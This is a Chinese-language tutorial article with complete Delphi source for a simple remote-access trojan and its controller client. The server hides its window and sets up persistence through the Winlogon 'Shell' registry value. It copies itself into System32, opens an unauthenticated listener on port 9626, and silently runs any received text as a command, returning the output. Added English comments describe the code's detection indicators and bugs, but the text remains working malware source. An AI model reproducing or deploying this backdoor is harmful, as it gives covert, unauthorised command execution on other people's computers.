
Delphi編寫簡單的木馬

編輯:Delphi

剛學電腦時很喜歡網絡安全,看著高手們寫的一個又一個攻擊工具,自己也總想努力去學好編程去寫屬於自己的程序。學Delphi快一年了,感覺什麼都沒學到,慚愧啊。今晚突然想學著寫木馬,於是手忙腳亂的敲了點代碼,超簡單,願自己能越寫越好!!!

程序跟傳統木馬一樣,分服務端和客戶端。運行服務端後會復制自身到SYSTEM32目錄下面,並在注冊表添加一自動行啟動項,打開本機9626端口開始等待接收客戶端的數據。當接收到客戶端數據時就當作CMD命令去執行,最後把回顯傳送回客戶端。客戶端很簡單,跟服務端連接成功後,輸入命令點執行,正常的話可以收到服務端的執行結果了。


源碼如下:

////Server.pas//////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
///部分代碼從網上收集///////////
////////////////////////////////

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Registry, ScktComp, StdCtrls;

type
  // Main form of the server unit. It is never shown (see FormCreate); the two
  // components and three handlers below are wired by the VCL designer.
  TFmMain = class(TForm)
    SS: TServerSocket;   // listening TCP socket; port is set in FormCreate
    Memo1: TMemo;        // scratch buffer that collects the child process output
    procedure FormCreate(Sender: TObject);                             // persistence setup, then start listening
    procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);     // greets every new connection
    procedure SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket); // runs received text as a command line
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  FmMain: TFmMain;   // auto-created form instance, referenced directly in FormCreate
  reg:TRegistry;     // global registry object; created and freed inside FormCreate

implementation

{$R *.dfm}

{ Runs once when the form is created. From a defender's point of view this is
  where the server plants its footprint: it hides the window, rewrites the
  Winlogon "Shell" value so the copy starts with every logon, copies itself
  into the system directory as Lysvr.exe, then starts listening on TCP 9626.
  None of the registry or file calls are checked for success, and a failure to
  listen is swallowed. }
procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;   // 51-char buffer, but only 50 is passed to GetSystemDirectory
begin
  Application.ShowMainForm:=False;
  FmMain.Left:=-200;          // keep the window hidden / off-screen while running
  reg:=TRegistry.Create;
  reg.RootKey:=HKEY_LOCAL_MacHINE;
  // Winlogon\Shell is a well-known autostart location: a Shell value other than
  // plain "Explorer.exe" is a common persistence indicator worth monitoring.
  // Writing under HKLM needs administrative rights; the results of OpenKey and
  // WriteString are not checked.
  reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
  if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
    reg.WriteString('Shell','Explorer.exe Lysvr.exe');   // create the logon autostart entry
  reg.Free;   // not in try/finally, so an exception above leaks the TRegistry
  GetSystemDirectory(sysdir,50);   // return value (required length) is ignored
  // Self-copy into the system directory (also needs administrative rights).
  // The 'true' flag means an existing file is not overwritten; copyfile's
  // result is ignored.
  if not FileExists(sysdir+'\Lysvr.exe') then
    copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

SS.Port:=9626;   // fixed listening port: a simple network-side detection hook
  try
    SS.Active:=True;
  except
  end;   // bind/listen failures are silently ignored; the process keeps running without a listener
end;

{ OnAccept handler: sends a fixed greeting to every new connection, with no
  authentication or origin check. Because the banner is constant it is also a
  convenient network signature for detection. }
procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
  Socket.SendText('連接成功');   // reply "connection succeeded" whenever a client connects
end;

{ OnClientRead handler: treats whatever text arrives on the socket as a
  command line, runs it with the server's own privileges, and returns the
  captured standard output. There is no authentication, no message framing
  and no validation of the received text. Observations for review:
  - fname is a fixed 255-byte buffer but StrPCopy copies the whole received
    string, so input longer than 254 characters overruns it;
  - on the CreatePipe failure path fname and ph are not freed, and on the
    CreateProcess failure path the two pipe handles are never closed. }
procedure TFmMain.SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;
hReadPipe,hWritePipe:THandle;
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;
pi:PROCESS_INFORMATION;
cchReadBuffer:DWord;
ph:PChar;                  // 5000-byte output buffer; ReadFile pulls at most 4096 bytes per call
fname:PChar;               // 255-byte copy of the command line handed to CreateProcess
res:string;                // unused
begin
  Memo1.Clear;
  remotecmd:=Socket.ReceiveText;   // raw socket text, used verbatim as the command line below
  fname:=allocmem(255);
  ph:=AllocMem(5000);
  lsa.nLength  :=sizeof(SECURITY_ATTRIBUTES);
  lsa.lpSecurityDescriptor  :=nil;
  lsa.bInheritHandle  :=True;      // the child must inherit the write end of the pipe
  if  CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false  then
  begin
    socket.SendText('不能創建管道');   // "cannot create pipe"; fname and ph leak on this path
    exit;
  end;
  fillchar(si,sizeof(STARTUPINFO),0);
  si.cb:=sizeof(STARTUPINFO);
  si.dwFlags:=(STARTF_USESTDHANDLES  or  STARTF_USESHOWWINDOW);
  si.wShowWindow:=SW_HIDE;         // child runs without a visible window
  si.hStdOutput:=hWritePipe;       // redirect the child's stdout into the pipe
  StrPCopy(fname,remotecmd);       // no length check against the 255-byte buffer
  ///// run the received text as a command /////
  if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
  begin
    socket.SendText('不能創建進程');   // "cannot create process"
    FreeMem(ph);
    FreeMem(fname);
    Exit;                          // hReadPipe / hWritePipe are not closed here
  end;
  // Poll the read end until the child has exited and the pipe is drained.
  // The parent still holds hWritePipe, so PeekNamedPipe does not see EOF on
  // child exit; the WaitForSingleObject check is what ends the loop.
  while(true)  do
  begin
  if  not  PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil)  then  break;
  if  cchReadBuffer<>0  then
  begin
  if  ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false  then  break;
    ph[cchReadbuffer]:=chr(0);     // NUL-terminate the chunk just read
    Memo1.Lines.Add(ph);
  end
  else
  if(WaitForSingleObject(pi.hProcess  ,0)=WAIT_OBJECT_0)  then  break;   // no data and child finished
    Sleep(100);                    // runs on every iteration, not only in the else branch
  end;
  ph[cchReadBuffer]:=chr(0);       // on the normal exit path cchReadBuffer is 0, so this appends an empty line
  Memo1.Lines.Add(ph);    // memo collects the output
  CloseHandle(hReadPipe);
  CloseHandle(pi.hThread);
  CloseHandle(pi.hProcess);
  CloseHandle(hWritePipe);
  FreeMem(ph);
  FreeMem(fname);
  socket.SendText(Memo1.Text);  /// send the collected output back to the client
end;

end.

///////////////////////////////////////////////////////////////////////////////////////////

//////客戶端/////////////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
////////////////////////////////

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, OleCtrls, SHDocVw, StdCtrls, IDBaseComponent, IdComponent,
  IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

type
  // Controller form. Only the components touched by the three handlers below
  // have a clear role from this unit; the others are declared but unused here.
  TFmMain = class(TForm)
    WebBrowser1: TWebBrowser;   // not referenced in this unit
    Label3: TLabel;
    Edit2: TEdit;               // target host (read in Button2Click)
    Label4: TLabel;
    Edit3: TEdit;               // target port, parsed with StrToInt
    Button2: TButton;           // connect
    CS: TClIEntSocket;          // outgoing TCP connection
    Edit4: TEdit;               // text to send (read in BitBtn2Click)
    Label5: TLabel;
    Memo1: TMemo;               // shows the most recent reply
    BitBtn2: TBitBtn;           // send
    procedure Button2Click(Sender: TObject);
    procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure BitBtn2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  FmMain: TFmMain;   // auto-created form instance

implementation

{$R *.dfm}

{ Connect button: takes host and port from the edit boxes and opens the
  client socket. StrToInt raises EConvertError on a non-numeric port, after
  Host has already been assigned. }
procedure TFmMain.Button2Click(Sender: TObject);
var
  TargetHost: string;
begin
  TargetHost := Edit2.Text;
  with CS do
  begin
    Host := TargetHost;
    Port := StrToInt(Edit3.Text);
    Open;
  end;
end;

{ OnRead handler: replaces the memo contents with the reply just received,
  followed by one blank line. }
procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
var
  Reply: string;
begin
  Memo1.Clear;
  Reply := Socket.ReceiveText;
  with Memo1.Lines do
  begin
    Add(Reply);
    Add('');
  end;
end;

{ Send button: writes the contents of Edit4 to the open client socket.
  No check is made that the socket is connected. }
procedure TFmMain.BitBtn2Click(Sender: TObject);
var
  Outgoing: string;
begin
  Outgoing := edit4.Text;
  CS.Socket.SendText(Outgoing);
end;

end.


本文來自編程入門網:http://www.bianceng.cn/Programming/Delphi/200705/937.htm
